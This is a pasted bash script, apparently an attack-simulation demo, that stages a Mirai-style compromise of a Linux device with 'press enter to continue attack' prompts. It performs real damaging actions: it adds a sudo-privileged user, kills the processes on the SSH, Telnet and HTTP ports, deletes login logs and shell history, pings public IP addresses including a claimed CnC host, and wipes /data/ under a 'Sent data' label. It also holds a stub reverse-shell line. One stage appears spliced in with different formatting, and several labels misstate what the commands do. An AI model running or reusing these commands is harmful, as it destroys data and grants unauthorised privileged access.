
Untitled

a guest Sep 11th, 2019 97 Never
  1. #!/bin/bash
  2. # Running from within the attacked device
  3.  
  4. # Local host reconnaissance detected
  5. echo "###################################################################"
  6. echo "      Conducting Reconnaissance                                    "
  7. echo "###################################################################"
  8.        
  9.     echo "Conducting analysis of host data..."
  10.     uname -a
  11.     echo "Got host data"
  12.     read -p "Press enter to continue attack"
  13.  
  14. # Detected suspicious use of the useradd command
  15. echo "###################################################################"
  16. echo "      Create User and Escalate Privilege                           "
  17. echo "###################################################################"
  18.  
  19.     USER="privilegeduser"${RANDOM}""
  20.    
  21.     echo "Adding user named ${USER} with privilege root to the system..."
  22.     useradd $USER
  23.     sudo usermod -aG sudo $USER
  24.     echo "Successfully added user named /"${USER}/" with privilege root to the system"
  25.     read -p "Press enter to continue attack"
  26.  
  27. # Process running on multiple ports, Process killing other processes
  28. echo "###################################################################"
  29. echo "      Kill SSH, Telnet and HTTP to hijack ports 23, 22, 80         "
  30. echo "            Original logs from Mirai killer.c actor                "
  31. echo "###################################################################"
  32.  
  33.     # port 23
  34.     echo "[killer] Trying to kill port 23"
  35.     echo "[killer] Finding and killing processes holding port 23"
  36.     kill -9 $(lsof -i:23 -t) 2> /dev/null
  37.     echo "[killer] Killed tcp/23 (telnet)"
  38.     # insert connect to port
  39.     echo "[killer] Bound to tcp/23 (Telnet)\n"
  40.  
  41.     # port 22
  42.     echo "[killer] Trying to kill port 22"
  43.     echo "[killer] Finding and killing processes holding port 22"
  44.     kill -9 $(lsof -i:22 -t) 2> /dev/null
  45.     echo "[killer] Killed tcp/22 (SSH)"
  46.     # insert connect to port
  47.     echo "[killer] Bound to tcp/22 (SSH)\n"
  48.  
  49.     # port 80
  50.     echo "[killer] Trying to kill port 80"
  51.     echo "[killer] Finding and killing processes holding port 80"
  52.     kill -9 $(lsof -i:80 -t) 2> /dev/null
  53.     echo "[killer] Killed tcp/80 (http)"
  54.     # insert connect to port
  55.     echo "[killer] Bound to tcp/80 (http)\n"
  56.     read -p "Press enter to continue attack"
  57.  
  58.  
  59. echo "###################################################################"
  60. echo "      Find and Kill Competing Malware                              "
  61. echo "###################################################################"
  62.  
  63.     echo "Looking for competing malware..."
  64.     kill -9 $(pgrep anime) 2> /dev/null
  65.     echo "Killing .anime malware process..."
  66.     echo "[killer] Finished"
  67.     read -p "Press enter to continue attack"
  68.  
  69.  
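echo "###################################################################"
echo "      Scan The Network for More Volunrable Devices                 "
echo "        Original logs from Mirai scanner.c actor                   "
echo "###################################################################"

# Stage 5: ICMP sweep narrated as Mirai's scanner.c. Three echo requests go to
# each of 13.92.249.0 through 13.92.249.19. The prefix is hard-coded and
# publicly routable, so these probes leave the test network. Only ping is
# used; no port is probed and no login is attempted.
printf '%s\n' "[scanner] Scanner process initialized. Scanning started..."
# Despite the name this is a dotted prefix, not CIDR notation; the loop
# appends the last octet.
IPCIDR=13.92.249.
for ((i = 0; i < 20; i++)); do
    IP="${IPCIDR}${i}"
    echo "pinging ${IP}"
    ping -c3 "$IP"
done
read -r -p "Press enter to continue attack"
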
  85. # Reverse shells, Suspicious IP address communication, Possible backdoor detected
  86. echo "###################################################################"
  87. echo "      Communicating with CnC for getting attack commands           "
  88. echo "###################################################################"
  89.  
  90.     echo "Setting up a backdoor..."
  91.     touch d-bus notifier
  92.     echo "Backdoor set up" 
  93.  
  94.     echo "Opening reverse shell..."
  95.     bash /dev/tcp/
  96.     echo "Reverse shell established"
  97.    
  98.     echo "Communicating with CnC server..."
  99.     ping -c3 110.249.212.46 > pingtoCnC.txt
  100.     echo "Listening to CnC for future attack commands..."
  101.     read -p "Press enter to continue attack"
  102.  
  103.  
  104. # Removal of system logs files detected, Potential overriding of common files,
  105. echo "###################################################################"
  106. echo "      Covering Tracks - Deleting Logs and Executables"
  107. echo "###################################################################"
  108.  
  109.  
  110.     echo "Removing system logs..."
  111.     rm /var/log/lastlog
  112.     echo "Removed system logs"
  113.    
  114.     echo "Overriding linux system files..."
  115.     cp /bin/netstat a
  116.     echo "Overrode linux system files"
  117.  
  118.     echo "Deleting history files..."
  119.     history -c
  120.     echo "Deleted history files"
  121.     read -p "Press enter to continue attack"
  122.  
  123.  
  124. echo "*******************************************************************"
  125. echo "*******************************************************************"
  126. echo "         Mirai Botnet Expansion Scenarios                          "
  127. echo "*******************************************************************"
  128. echo "*******************************************************************"
  129.     read -p "Press enter to continue attack"
  130.  
  131.  
  132. # Crypto Coin Miner
  133. echo "###################################################################"
  134. echo "  Mirai Variant - Mining Crypto Currency Using the Botnet          "
  135. echo "###################################################################"
  136.    
  137.     echo "Setting up crypto miner..."
  138.     git clone https://github.com/cpuminer
  139.     echo "Mining crypto with device resources"
  140.     read -p "Press enter to continue attack"
  141.  
  142. # Possible loss of data detected
  143. echo "###################################################################"
  144. echo "   Fish Tank Scenario - Egress Data Through IoT Device             "
  145. echo "###################################################################"
  146.    
  147.     echo "Sending data collected through the device..."
  148.     rm -rf /data/
  149.     echo "Sent data"
  150.     read -p "Press enter to continue attack"